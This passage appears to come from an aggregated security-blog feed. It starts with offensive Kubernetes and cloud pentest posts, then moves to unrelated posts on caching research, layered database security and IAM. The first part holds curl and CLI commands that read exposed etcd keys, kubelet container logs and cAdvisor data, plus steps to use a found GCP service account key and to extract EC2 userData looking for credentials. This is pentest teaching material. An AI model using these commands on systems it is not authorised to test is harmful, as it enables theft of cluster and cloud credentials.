    • /metrics
    • /pods
  • 4194/tcp - cAdvisor
  • 2379/tcp - etcd (you'll see it on other ports though)
    • Etcd holds all the configs
    • Config storage
  • 30000 - dashboard
  • 443/6443 - API server
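A quick way to check a target for all of the above in one pass; a sketch (1.2.3.4 is a placeholder):

$ nmap -sT -p 443,2379,4194,6443,10250,10255,30000,44134 1.2.3.4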

Kubernetes: Kubernetes Dashboard


Tesla was famously hacked for leaving this open, and it's pretty rare to find it exposed externally now, but it's useful to know what it is and what you can do with it.

Usually found on port 30000

kube-hunter finding for it:

Vulnerabilities
+-----------------------+---------------+----------------------+----------------------+------------------+
| LOCATION              | CATEGORY      | VULNERABILITY        | DESCRIPTION          | EVIDENCE         |
+-----------------------+---------------+----------------------+----------------------+------------------+
| 1.2.3.4:30000         | Remote Code   | Dashboard Exposed    | All oprations on the | nodes: pach-okta |
|                       | Execution     |                      | cluster are exposed  |                  |
+-----------------------+---------------+----------------------+----------------------+------------------+

Why do you care?  It has access to all pods and secrets within the cluster. So rather than using command line tools to get secrets or run code you can just do it in a web browser.

Screenshots of what it looks like (omitted here) include viewing secrets, utilization, logs, and shells.

Kubernetes: Kubelet API containerLogs endpoint


How to get the info that kube-hunter reports for the open /containerLogs endpoint:

Vulnerabilities
+---------------+-------------+------------------+----------------------+----------------+
| LOCATION      | CATEGORY    | VULNERABILITY    | DESCRIPTION          | EVIDENCE       |
+---------------+-------------+------------------+----------------------+----------------+
| 1.2.3.4:10250 | Information | Exposed Container| Output logs from a   |                |
|               | Disclosure  | Logs             | running container    |                |
|               |             |                  | are using the        |                |
|               |             |                  | exposed              |                |
|               |             |                  | /containerLogs       |                |
|               |             |                  | endpoint             |                |
+---------------+-------------+------------------+----------------------+----------------+

First step, grab the output from /runningpods/ (as shown in the 10250 posts above). You'll need the namespace, pod name, and container name.

Thus, given the below runningpods output:

{"metadata":{"name":"monitoring-influxdb-grafana-v4-6679c46745-zhvjw","namespace":"kube-system","uid":"0d22cdad-06e5-11e9-a7f3-6ac885fbc092","creationTimestamp":null},"spec":{"containers":[{"name":"grafana","image":"sha256:8cb3de219af7bdf0b3ae66439aecccf94cebabb230171fa4b24d66d4a786f4f7","resources":{}},{"name":"influxdb","image":"sha256:577260d221dbb1be2d83447402d0d7c5e15501a89b0e2cc1961f0b24ed56c77c","resources":{}}]},

turns into:

https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/grafana



and

https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/influxdb
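Hitting either of those with curl (-k to ignore the self-signed cert) dumps that container's logs:

curl -sk https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/grafana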



Kubernetes: Master Post

I have a few Kubernetes posts queued up and will make this the master post to index and give references for the topic. If I'm missing blog posts or useful resources, ping me here or on Twitter.

Talks you should watch if you are interested in Kubernetes:


Hacking and Hardening Kubernetes Clusters by Example [I] - Brad Geesaman
https://www.youtube.com/watch?v=vTgQLzeBfRU
https://github.com/bgeesaman/
https://github.com/bgeesaman/hhkbe [demos for the talk above]
https://schd.ws/hosted_files/kccncna17/d8/Hacking%20and%20Hardening%20Kubernetes%20By%20Example%20v2.pdf [slide deck]


Perfect Storm: Taking the Helm of Kubernetes - Ian Coldwater
https://www.youtube.com/watch?v=1k-GIDXgfLw


A Hacker's Guide to Kubernetes and the Cloud - Rory McCune
Shipping in Pirate-Infested Waters: Practical Attack and Defense in Kubernetes
https://www.youtube.com/watch?v=ohTq0no0ZVU


Blog posts by others:

https://techbeacon.com/hackers-guide-kubernetes-security
https://elweb.co/the-security-footgun-in-etcd/
https://www.4armed.com/blog/hacking-kubelet-on-gke/
https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/
https://www.4armed.com/blog/hacking-digitalocean-kubernetes/
https://github.com/freach/kubernetes-security-best-practice
https://neuvector.com/container-security/kubernetes-security-guide/
https://medium.com/@pczarkowski/the-kubernetes-api-call-is-coming-from-inside-the-cluster-f1a115bd2066
https://blog.intothesymmetry.com/2018/12/persistent-xsrf-on-kubernetes-dashboard.html
https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/
https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/
https://raesene.github.io/blog/2017/04/02/Kubernetes-Service-Tokens/
https://www.cyberark.com/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions/
https://labs.mwrinfosecurity.com/blog/attacking-kubernetes-through-kubelet/
https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/


Auditing tools

https://github.com/Shopify/kubeaudit
https://github.com/aquasecurity/kube-bench
https://github.com/aquasecurity/kube-hunter

CVE-2018-1002105 resources

https://blog.appsecco.com/analysing-and-exploiting-kubernetes-apiserver-vulnerability-cve-2018-1002105-3150d97b24bb
https://gravitational.com/blog/kubernetes-websocket-upgrade-security-vulnerability/
https://github.com/gravitational/cve-2018-1002105
https://github.com/evict/poc_CVE-2018-1002105

CG Posts:

Open Etcd: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-open-etcd.html
Etcd with kube-hunter: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunterpy-etcd.html
cAdvisor: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-cadvisor.html

Kubernetes ports: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-list-of-ports.html
Kubernetes dashboards: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubernetes-dashboard.html
Kubelet 10255: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunter-10255.html
Kubelet 10250
     - Container Logs: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubelet-api-containerlogs.html
     - Getting shellz 1: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250.html
     - Getting shellz 2: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250_16.html


Cloud Metadata URLs and Kubernetes


I'll update this post as they get posted.

Kubernetes: cAdvisor

"cAdvisor (Container Advisor) provides container users an understanding of the resource usage and performance characteristics of their running containers. It is a running daemon that collects, aggregates, processes, and exports information about running containers."

Runs on port 4194.

Links:
https://kubernetes.io/docs/tasks/debug-application-cluster/resource-usage-monitoring/
https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/

What do you get? Information disclosure about the metrics of the containers.

Example request to hit the API and dump data:

http://1.2.3.4:4194/api/v2.0/spec?recursive=true
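For example, with curl, piping through python -mjson.tool to pretty-print the response:

$ curl -s "http://1.2.3.4:4194/api/v2.0/spec?recursive=true" | python -mjson.tool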


Kubernetes: kube-hunter.py etcd


I mentioned a few of the auditing tools that exist in the master post. Kube-Hunter is one that is pretty ok; you can use it to quickly scan for multiple Kubernetes issues.


Example run:
$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning      (scans one or more specific IPs or DNS names)
2. Subnet scanning      (scans subnets on all local network interfaces)
3. IP range scanning    (scans a given IP range)
Your choice: 1
Remotes (separated by a ','): 1.2.3.4
~ Started
~ Discovering Open Kubernetes Services...
|
| Etcd:
|   type: open service
|   service: Etcd
|_  host: 1.2.3.4:2379
|
| Etcd Remote version disclosure:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote version disclosure might give an
|_    attacker a valuable data to attack a cluster
|
| Etcd is accessible using insecure connection (HTTP):
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Etcd is accessible using HTTP (without
|     authorization and authentication), it would allow a
|     potential attacker to
|     gain access to
|_    the etcd
|
| Etcd Remote Read Access Event:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote read access might expose to an
|_    attacker cluster's possible exploits, secrets and more.

----------

Nodes
+-------------+----------------+
| TYPE        | LOCATION       |
+-------------+----------------+
| Node/Master | 1.2.3.4        |
+-------------+----------------+

Detected Services
+---------+---------------------+----------------------+
| SERVICE | LOCATION            | DESCRIPTION          |
+---------+---------------------+----------------------+
| Etcd    | 1.2.3.4:2379        | Etcd is a DB that    |
|         |                     | stores cluster's     |
|         |                     | data, it contains    |
|         |                     | configuration and    |
|         |                     | current state        |
|         |                     | information, and     |
|         |                     | might contain        |
|         |                     | secrets              |
+---------+---------------------+----------------------+

Vulnerabilities
+--------------+------------------+----------------------+---------------------+--------------------------+
| LOCATION     | CATEGORY         | VULNERABILITY        | DESCRIPTION         | EVIDENCE                 |
+--------------+------------------+----------------------+---------------------+--------------------------+
| 1.2.3.4:2379 | Unauthenticated  | Etcd is accessible   | Etcd is accessible  | {"etcdserver":"3.3.9     |
|              | Access           | using insecure       | using HTTP (without | ","etcdcluster":"3.3     |
|              |                  | connection (HTTP)    | authorization and   | ...                      |
|              |                  |                      | authentication), it |                          |
|              |                  |                      | would allow a       |                          |
|              |                  |                      | potential attacker  |                          |
|              |                  |                      | to                  |                          |
|              |                  |                      |     gain access to  |                          |
|              |                  |                      | the etcd            |                          |
+--------------+------------------+----------------------+---------------------+--------------------------+
| 1.2.3.4:2379 | Information      | Etcd Remote version  | Remote version      | {"etcdserver":"3.3.9     |
|              | Disclosure       | disclosure           | disclosure might    | ","etcdcluster":"3.3     |
|              |                  |                      | give an attacker a  | ...                      |
|              |                  |                      | valuable data to    |                          |
|              |                  |                      | attack a cluster    |                          |
+--------------+------------------+----------------------+---------------------+--------------------------+
| 1.2.3.4:2379 | Access Risk      | Etcd Remote Read     | Remote read access  | {"action":"get","nod     |
|              |                  | Access Event         | might expose to an  | e":{"dir":true,"node     |
|              |                  |                      | attacker cluster's  | ...                      |
|              |                  |                      | possible exploits,  |                          |
|              |                  |                      | secrets and more.   |                          |
+--------------+------------------+----------------------+---------------------+--------------------------+

Kubernetes: open etcd

Quick post on Kubernetes and open etcd (port 2379)

"etcd is a distributed key-value store. In fact, etcd is the primary datastore of Kubernetes; storing and replicating all Kubernetes cluster state. As a critical component of a Kubernetes cluster having a reliable automated approach to its configuration and management is imperative."

-from: https://coreos.com/blog/introducing-the-etcd-operator.html 

What this means in English is that etcd stores the current state of the Kubernetes cluster, usually including the Kubernetes tokens and passwords. If you check out the following references, you can get a sense of the pain level that could potentially be involved. At minimum you can get network info or a list of running pods, and at best credentials.

refs: 
https://techbeacon.com/hackers-guide-kubernetes-security 
https://elweb.co/the-security-footgun-in-etcd/
https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/

The second link talks extensively about the types of info they found when they hit all the Shodan endpoints for 2379 and did some analysis on the results.

If you manage to find open etcd, the easiest way to check for creds is to just do a curl request for:

GET http://ip_address:2379/v2/keys/?recursive=true
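As an actual curl command (python -mjson.tool just pretty-prints the response):

$ curl -s "http://1.2.3.4:2379/v2/keys/?recursive=true" | python -mjson.tool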

Example loot (screenshots omitted): usually it's boring stuff, but occasionally you'll get more interesting things, and sometimes fun things like kubelet tokens.

I found a GCP service account token…now what?

Google Cloud Platform (GCP) is rapidly growing in popularity and I haven't seen too many posts on f**king it up, so I'm going to do at least one :-)

Google has several ways to do authentication, but most likely what you are going to come across, shoved into code somewhere or in a dotfile, is a service account JSON file.

It's going to look similar to this:
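A redacted sketch of the standard service account key format (every value below is a placeholder):

{
  "type": "service_account",
  "project_id": "some-project-id",
  "private_key_id": "0123456789abcdef...SNIP...",
  "private_key": "-----BEGIN PRIVATE KEY-----\n...SNIP...\n-----END PRIVATE KEY-----\n",
  "client_email": "something@some-project-id.iam.gserviceaccount.com",
  "client_id": "123456789012345678901",
  "auth_uri": "https://accounts.google.com/o/oauth2/auth",
  "token_uri": "https://accounts.google.com/o/oauth2/token"
}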

These service account files are similar to AWS tokens in that it can be difficult to determine what they have access to if you don't already have console and/or IAM access. However, with a little bit of scripting we can brute force at least some of the token's functionality pretty quickly. The issue is that a service account for something like GCP Compute looks the same as one you made to manage your calendar or one of the hundreds of other Google services.

You'll need to install the gcloud tools for your OS. Info here: https://cloud.google.com/sdk/

Once you have the gcloud suite of tools installed you can auth with the json file with the following command:

gcloud auth activate-service-account --key-file=KEY_FILE

If the key is invalid you'll see something like the below:

gcloud auth activate-service-account --key-file=21.json
ERROR: (gcloud.auth.activate-service-account) There was a problem refreshing your current auth tokens: invalid_grant: Not a valid email or user ID.

Otherwise it will look similar to below:

gcloud auth activate-service-account --key-file=/Users/CG/Documents/pentest/gcp-weirdaal/gcp.json
Activated service account credentials for: [python@removed.iam.gserviceaccount.com]

You can validate it worked by issuing the gcloud auth list command:

gcloud auth list
                  Credentialed Accounts
ACTIVE  ACCOUNT

*       python@removed.iam.gserviceaccount.com


I put together a shell script that runs through a bunch of commands to enumerate information. The only info you need to provide is the project name. This can be found in the JSON file in the project_id field or by issuing the gcloud projects list command. Sometimes there are multiple projects associated with an account, and you'd need to run the shell script for each project.

The first time you run these API calls you might need to pass a "Y" to the CLI to enable it. You can get around these manual shenanigans by doing a:

yes | ./gcp_enum.sh 

This will answer Yes for you each time :-)
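The script itself is just a pile of gcloud/gsutil enumeration calls. A minimal sketch of the kinds of commands it runs (PROJECT is a placeholder; this is not the literal script):

gcloud projects list
gcloud compute instances list --project $PROJECT
gcloud compute firewall-rules list --project $PROJECT
gcloud sql instances list --project $PROJECT
gcloud container clusters list --project $PROJECT
gcloud iam service-accounts list --project $PROJECT
gsutil ls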

NCC Group also has two tools you could check out:

https://github.com/nccgroup/G-Scout

and

https://github.com/nccgroup/ScoutSuite


enjoy

CG

AWS EC2 instance userData

In an effort to get myself blogging again, I'll be doing a few short posts to get the juices flowing (hopefully).

Today I learned about the userData instance attribute for AWS EC2.

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html

In general, I thought instance metadata was only something you could hit from WITHIN the instance via the metadata URL: http://169.254.169.254/latest/meta-data/

However, if you read the link above, there is an option to add metadata at boot time.


You can also use instance metadata to access user data that you specified when launching your instance. For example, you can specify parameters for configuring your instance, or attach a simple script. 

That's interesting, right?!?! So if you have some AWS creds, the easiest way to check for this (after you enumerate instance IDs) is with the AWS CLI.

$ aws ec2 describe-instance-attribute --attribute userData --instance-id i-0XXXXXXXX

An error occurred (InvalidInstanceID.NotFound) when calling the DescribeInstanceAttribute operation: The instance ID 'i-0XXXXXXXX' does not exist

ah crap, you need the region...

$ aws ec2 describe-instance-attribute --attribute userData --instance-id i-0XXXXXXXX --region us-west-1
{
    "InstanceId": "i-0XXXXXXXX",
    "UserData": {
        "Value": "bm90IHRvZGF5IElTSVMgOi0p"
    }
}


Anyway, that can get tedious, especially if the org has a ton of things running. This is precisely the reason @cktricky and I built weirdAAL. Surely no one would be sticking creds into things at boot time via shell scripts :-)


The module loops through all the regions and queries any instances it finds for the userData attribute. Hurray for automation.

That module is in the current version of weirdAAL. Enjoy.

-CG

Improve Security by Thinking Beyond the Security Realm

It used to be that dairy farmers relied on whatever was growing in the area to feed their cattle. They filled the trough with vegetation grown right on the farm. They probably relied heavily on whatever grasses grew naturally and perhaps added some high-value grains like barley and corn. Today, with better technology and knowledge, dairy farmers work with nutritionists to develop a personalized concentrate of carbohydrates, proteins, fats, minerals, and vitamins that gets added to the natural feed. The result is much healthier cattle and more predictable growth.

We’re going through a similar enlightenment in the security space. To get the best results, we need to fill the trough that our Machine Learning will eat from with high-value data feeds from our existing security products (whatever happens to be growing in the area) but also (and more precisely for this discussion) from beyond what we typically consider security products to be.

In this post to the Oracle Security blog, I make the case that "we shouldn’t limit our security data to what has traditionally been in-scope for security discussions" and how understanding Application Topology (and feeding that knowledge into the security trough) can help reduce risk and improve security.

Click to read the full article: Improve Security by Thinking Beyond the Security Realm

Improving Caching Strategies With SSICLOPS

F-Secure development teams participate in a variety of academic and industrial collaboration projects. Recently, we’ve been actively involved in a project codenamed SSICLOPS. This project has been running for three years, and has been a joint collaboration between ten industry partners and academic entities. Here’s the official description of the project.

The Scalable and Secure Infrastructures for Cloud Operations (SSICLOPS, pronounced “cyclops”) project focuses on techniques for the management of federated cloud infrastructures, in particular cloud networking techniques within software-defined data centres and across wide-area networks. SSICLOPS is funded by the European Commission under the Horizon2020 programme (https://ssiclops.eu/). The project brings together industrial and academic partners from Finland, Germany, Italy, the Netherlands, Poland, Romania, Switzerland, and the UK.

The primary goal of the SSICLOPS project is to empower enterprises to create and operate high-performance private cloud infrastructure that allows flexible scaling through federation with other clouds without compromising on their service level and security requirements. SSICLOPS federation supports the efficient integration of clouds, no matter if they are geographically collocated or spread out, belong to the same or different administrative entities or jurisdictions: in all cases, SSICLOPS delivers maximum performance for inter-cloud communication, enforce legal and security constraints, and minimize the overall resource consumption. In such a federation, individual enterprises will be able to dynamically scale in/out their cloud services: because they dynamically offer own spare resources (when available) and take in resources from others when needed. This allows maximizing own infrastructure utilization while minimizing excess capacity needs for each federation member.

Many of our systems (both backend and on endpoints) rely on the ability to quickly query the reputation and metadata of objects from a centrally maintained repository. Reputation queries of this type are served either directly from the central repository, or through one of many geographically distributed proxy nodes. When a query is made to a proxy node, if the required verdicts don’t exist in that proxy’s cache, the proxy queries the central repository, and then delivers the result. Since reputation queries need to be low-latency, the additional hop from proxy to central repository slows down response times.

In the scope of the SSICLOPS project, we evaluated a number of potential improvements to this content distribution network. Our aim was to reduce the number of queries from proxy nodes to the central repository, by improving caching mechanisms for use cases where the set of the most frequently accessed items is highly dynamic. We also looked into improving the speed of communications between nodes via protocol adjustments. Most of this work was done in cooperation with Deutsche Telekom and Aalto University.

The original implementation of our proxy nodes used a Least Recently Used (LRU) caching mechanism to determine which cached items should be discarded. Since our reputation verdicts have time-to-live values associated with them, these values were also taken into account in our original algorithm.

Hit Rate Results

Initial tests performed in October 2017 indicated that SG-LRU outperformed LRU on our dataset

During the project, we worked with Gerhard Hasslinger’s team at Deutsche Telekom to evaluate whether alternate caching strategies might improve the performance of our reputation lookup service. We found that Score-Gated LRU / Least Frequently Used (LFU) strategies outperformed our original LRU implementation. Based on the conclusions of this research, we have decided to implement a windowed LFU caching strategy, with some limited “predictive” features for determining which items might be queried in the future. The results look promising, and we’re planning on bringing the new mechanism into our production proxy nodes in the near future.

Fraction of top-k results compared to cache hit rates:

SG-LRU exploits the focus on top-k requests by keeping most top-k objects in the cache

The work done in SSICLOPS will serve as a foundation for the future optimization of content distribution strategies in many of F-Secure’s services, and we’d like to thank everyone who worked with us on this successful project!

Layered Database Security in the age of Data Breaches

We live in a time of daily breach notifications. One recently affected organization in Germany put out a statement which said: "The incident is not attributable to security deficiencies." and "Human error can also be ruled out." They went on to say that it is "virtually impossible to provide viable protection against organized, highly professional hacking attacks." It's a tough climate we find ourselves in. It just feels too hard or impossible at times. And there's some truth to that. There are way too many potential attack vectors for comfort.

Many breaches occur in ways that make it difficult to pinpoint exactly what might have prevented it. Or, the companies involved hide details about what actually happened or how. In some cases, they lie. They might claim there was some Advanced Persistent Threat on the network when in reality, it was a simple phishing attack where credentials were simply handed over.

In one recent case, a third party vendor apparently uploaded a database file to an unsecured Amazon AWS server. A media outlet covering the story called out that it was not hacking because the data was made so easily available. Numerous checkpoints come to mind that each could have prevented or lessened the damage in this scenario. I’d like to paint a picture of the numerous layers of defense that should be in place to help prevent this type of exposure.

Layer 1: Removing Production Data
The data should have been long removed from the database.
Assuming this is a non-production database (and I sure hope it is), it should have been fully masked before it was even saved as a file. Masking data means completely removing the original sensitive data and replacing it with fake data that looks and acts real. This enables safe use of the database for app development, QA, and testing. Data can be masked as it’s exported from the production database (most secure) or in a secure staging environment after the initial export. Had this step been done, the database could safely be placed on an insecure AWS server with limited security concerns because there’s no real data. An attacker could perhaps use the DB schema or other details to better formulate an attack on the production data, so I’m not recommending posting masked databases publicly, but the risk of data loss is severely limited once the data is masked.

Layer 2: Secure Cloud Server Configuration
The researcher should never have been able to get to the file.
A security researcher poking around the web should never have been able to access this database file. Proper server configuration and access controls should prevent unauthorized access to any files (including databases). In addition to documenting proper security configuration, certain Cloud Security Access Brokers can be used to continuously monitor AWS instances to ensure that server configurations match the corporate guidelines. Any instances of configuration drift can be auto-remediated with these solutions to ensure that humans don’t accidentally misconfigure servers or miss security settings in the course of daily administration.

Layer 3: Apply Database Encryption
Even with access to the database file, the researcher should not have been able to access the data.
At-rest data encryption that is built into the database protects sensitive data against this type of scenario. Even if someone has the database file, if it were encrypted, the file would essentially be useless. An attacker would have to implement an advanced crypto attack which would take enormous resources and time to conduct and is, for all intents and purposes, impractical. Encryption is a no-brainer. Some organizations use disk-layer encryption, which is OK in the event of lost or stolen disk. However, if a database file is moved to an unencrypted volume, it is no longer protected. In-database encryption improves security because the security stays with the file regardless of where it’s moved or exported. The data remains encrypted and inaccessible without the proper encryption keys regardless of where the database file is moved.

Layer 4: Apply Database Administrative Controls
Even with administrative permissions to the database, the researcher should not have been able to access the sensitive data.
I’m not aware of similar capabilities outside of Oracle database, but Oracle Database Vault would have also prevented this breach by implementing access controls within the database. Database Vault effectively segregates roles (enforces Separation of Duties) so that even an attacker with DBA permissions and access to the database file and encryption keys cannot run queries against the sensitive application data within the database because their role does not allow it. This role-based access, enforced within the database, is an extremely effective control to avoid accidental access that may occur throughout the course of daily database administration.

Layer 5: Protect Data Within the Database
Even with full authorization to application data, highly sensitive fields should be protected within the database.
Assuming all of the other layers break down and you have full access to the unencrypted database file and credentials that are authorized to access the sensitive application data, certain highly sensitive fields should be protected via application-tier encryption. Social Security Numbers and Passwords, for example, shouldn’t be stored in plain text. By applying protection for these fields at the app layer, even fully authorized users wouldn’t have access. We all know that passwords should be hashed so that the password field is only useful to the individual user who enters their correct password. But other fields, like SSN, can be encrypted at the app layer to protect against accidental exposure (human error), intentional insider attack, or exposed credentials (perhaps via phishing attack).

Maybe the vendor didn’t follow the proper protocols instituted by the organization. Maybe they made a human error; we all make mistakes. But, that’s why a layered approach to database security is critical on any database instances where sensitive production data resides. Security protocols shouldn’t require humans to make the right decisions. They should apply security best practices by default and without option.

Assuming this was a non-production database, any sensitive data should have been fully masked/replaced before it was even made available. And if it was a production DB, database encryption and access control protections that stay with the database (during export, or if the database file is moved off an encrypted volume) should have been applied. The data should have been protected before the vendor's analyst ever got his/her hands on it. Oracle Database Vault would have prevented even a DBA-type user from being able to access the sensitive user data that was exposed here. These are not new technologies; they’ve been around for many years with plentiful documentation and industry awareness.

Unfortunately, a few of the early comments I read on this particular event were declarations or warnings about how this proves that cloud is less secure than on-premises deployments. I don’t agree. Many cloud services are configured with security by default and offer far more protection than company-owned data centers. Companies should seek cloud services that enable security by default and that offer layered security controls; more security than their own data centers. It’s more than selecting the right Cloud Service Provider. You also need to choose the right service; one that matches the specific needs (including security needs) of your current project. The top CSPs offer multiple IaaS and/or PaaS options that may meet the basic project requirements. While cloud computing grew popular because it’s easy and low cost, ease-of-use and cost are not always the most important factors when choosing the right cloud service. When sensitive data is involved, security needs to be weighed heavily when making service decisions.

I'll leave you with this. Today's computing landscape is extremely complex and constantly changing. But security controls are evolving to address what has been called the extended enterprise (which includes cloud computing and user mobility among other characteristics). Don't leave security in the hands of humans. And apply security in layers to cover as many potential attack vectors as possible. Enable security by default and apply automated checks to ensure that security configuration guidelines are being followed.

Note: Some of the content above is based on my understanding of Oracle security products (encryption, masking, CASB, etc.) Specific techniques or advantages mentioned may not apply to other vendors’ similar solutions.

IAM for the Third Platform

As more people are using the phrase "third platform", I'll assume it needs no introduction or explanation. The mobile workforce has been mobile for a few years now. And most organizations have moved critical services to cloud-based offerings. It's not a prediction, it's here.

The two big components of the third platform are mobile and cloud. I'll talk about both.

Mobile

A few months back, I posed the question "Is MAM Identity and Access Management's next big thing?" and since I did, it's become clear to me that the answer is a resounding YES!

Today, I came across a blog entry explaining why Android devices are a security nightmare for companies. The pain is easy to see: OS updates and security patches are slow to arrive, and user behavior is, well... questionable. So organizations should be concerned about how their data and applications are being accessed across this sea of devices and applications. As we know, locking down the data is not an option. In the extended enterprise, people need access to data from wherever they are, on whatever device they're using. So the challenge is to control the flow of information and restrict it to proper use.

So, here's a question: is MDM the right approach to controlling access for mobile users? Do you really want to stand up a new technology silo that manages end-user devices? Is that even practical? I think certain technologies live a short life because they quickly get passed over by something new and better (think electric typewriters). MDM is one of those. Although it's still fairly new and good at what it does, I would make the claim that MDM is already antiquated technology. In a BYOD world, people don't want to turn control of their devices over to their employers. The age of enterprises controlling devices went out the window with BlackBerry's market share.

Containerization is where it's at. With App Containerization, organizations create a secure virtual workspace on mobile devices that enables corporate-approved apps to access, use, edit, and share corporate data while protecting that data from escaping to unapproved apps, personal email, OS malware, and other on-device leakage points. For enterprise use cases, this just makes more sense than MDM. And many of the top MDM vendors have validated the approach by announcing MAM offerings. Still, these solutions maintain a technology silo specific to remote access, which doesn't make much sense to me.
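For a sense of what the container is actually doing, here's a simplified Python sketch of the data-flow decision a MAM agent might make on-device. The policy model and app names are purely illustrative, not any vendor's actual API.

```python
# Sketch of the data-flow decision a MAM container makes on-device
# (illustrative policy model; app names and rules are made up).
MANAGED_APPS = {"corp-mail", "corp-docs", "corp-crm"}

def may_share(source_app: str, target_app: str, doc_classification: str) -> bool:
    # Corporate data may move freely between managed apps...
    if source_app in MANAGED_APPS and target_app in MANAGED_APPS:
        return True
    # ...but classified data never leaves the workspace (no personal email,
    # no unapproved apps, no on-device leakage points).
    if doc_classification in {"confidential", "restricted"}:
        return False
    return True  # public data may exit the container

assert may_share("corp-docs", "corp-mail", "confidential") is True
assert may_share("corp-docs", "personal-gmail", "confidential") is False
```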

As an alternate approach, let's build MAM capabilities directly into the existing Access Management platform. Access Management for the third platform must accommodate mobile device use-cases. There's no reason to manage mobile device access differently than desktop access. It's the same applications, the same data, and the same business policies. User provisioning workflows should accommodate provisioning mobile apps and data rights, just as they've been extended to provision Privileged Account rights. You don't want or need separate silos.
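As a hypothetical illustration, a single provisioning request could carry desktop, mobile, and privileged entitlements through one workflow; the field names here are made up for the example.

```python
# One provisioning request covering desktop, mobile, and privileged access,
# flowing through the same approval workflow (field names are illustrative).
request = {
    "identity": "jdoe",
    "entitlements": [
        {"type": "app",        "target": "crm-web",     "role": "sales_rep"},
        {"type": "mobile_app", "target": "crm-ios",     "role": "sales_rep"},
        {"type": "privileged", "target": "crm-db-prod", "role": "read_only",
         "requires": "manager_and_dba_approval"},
    ],
}
```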

Cloud

The same can be said for cloud-hosted apps. Cloud apps are simply part of the extended enterprise and should also be managed via the enterprise Access Management platform.

There's been a lot of buzz in the IAM industry about managing access (and providing SSO) to cloud services. A number of niche vendors have even popped up that provide exactly that as their primary value proposition. But the core technology in these stand-alone solutions is nothing new. In most cases, it's basic federation. In some cases, it's ESSO-style form-fill. There's no magic to delivering SSO to SaaS apps. In fact, it's typically easier than SSO to enterprise apps, because SaaS infrastructures are newer and support newer standards and protocols (SAML, REST, etc.).
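To show just how little magic there is, here's a minimal sketch of federation-style token issuance and verification. I've used JWT (via the PyJWT package) instead of SAML's signed XML to keep it short, and a shared secret where a real federation would use asymmetric keys and published metadata; the trust model (the IdP signs an assertion, the service provider verifies it) is the same.

```python
# Minimal federation sketch: the enterprise IdP issues a signed assertion,
# the SaaS provider verifies it. JWT shown for brevity; SAML works the same
# way conceptually, just with signed XML. All URLs are placeholders.
import time
import jwt  # pip install PyJWT

SHARED_SECRET = "rotate-me"  # real federations use asymmetric keys/metadata

def idp_issue_assertion(user: str, audience: str) -> str:
    claims = {"sub": user, "aud": audience,
              "iss": "https://idp.example.com",
              "exp": int(time.time()) + 300}
    return jwt.encode(claims, SHARED_SECRET, algorithm="HS256")

def sp_verify(token: str, audience: str) -> dict:
    return jwt.decode(token, SHARED_SECRET, algorithms=["HS256"],
                      audience=audience, issuer="https://idp.example.com")

token = idp_issue_assertion("jdoe", "https://saas.example.com")
print(sp_verify(token, "https://saas.example.com")["sub"])  # -> jdoe
```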

My Point

I guess if I had to boil this down, I'm really just trying to dispel the myths about mobile and cloud solutions. When you get past the marketing jargon, we're still talking about Access Management and Identity Governance. Some of the new technologies are pretty cool (containerization solves some interesting, complex problems related to BYOD). But in the end, I'd want to manage enterprise access in one place with one platform. One Identity, One Platform. I wouldn't stand up an IDaaS solution just to have SSO to cloud apps. And I wouldn't want to introduce an MDM vendor to control access from mobile devices.

The third platform simply extends the enterprise beyond the firewall. The concept isn't new and the technologies are mostly the same. As more and newer services adopt common protocols, it gets even easier to support increasingly complex use-cases. An API Gateway, for example, allows a mobile app to access legacy mainframe data over REST protocols. And modern Web Access Management (WAM) solutions perform device fingerprinting to increase assurance and reduce risk while delivering an SSO experience. Mobile Security SDKs enable organizations to build their own apps with native security that's integrated with the enterprise WAM solution (this is especially valuable for consumer-facing apps).
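Here's a toy sketch of that gateway pattern using Flask. The token check and the mainframe lookup are stand-ins for real WAM integration and a real legacy adapter; every name in it is illustrative.

```python
# Toy API gateway: exposes a legacy lookup over REST, enforcing the same
# access policy the WAM layer applies to web traffic (all names illustrative).
from flask import Flask, request, jsonify, abort

app = Flask(__name__)

def token_is_valid(token: str) -> bool:
    return token == "demo-token"  # stand-in for real WAM/session validation

def legacy_lookup(account_id: str) -> dict:
    # Stand-in for a mainframe transaction behind an adapter.
    return {"account": account_id, "balance": "1024.00"}

@app.route("/api/accounts/<account_id>")
def get_account(account_id: str):
    auth = request.headers.get("Authorization", "")
    if not token_is_valid(auth.removeprefix("Bearer ")):
        abort(401)
    return jsonify(legacy_lookup(account_id))

# flask run, then:
# curl -H "Authorization: Bearer demo-token" localhost:5000/api/accounts/42
```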

And all of this should be delivered on a single platform for Enterprise Access Management. That's third-platform IAM.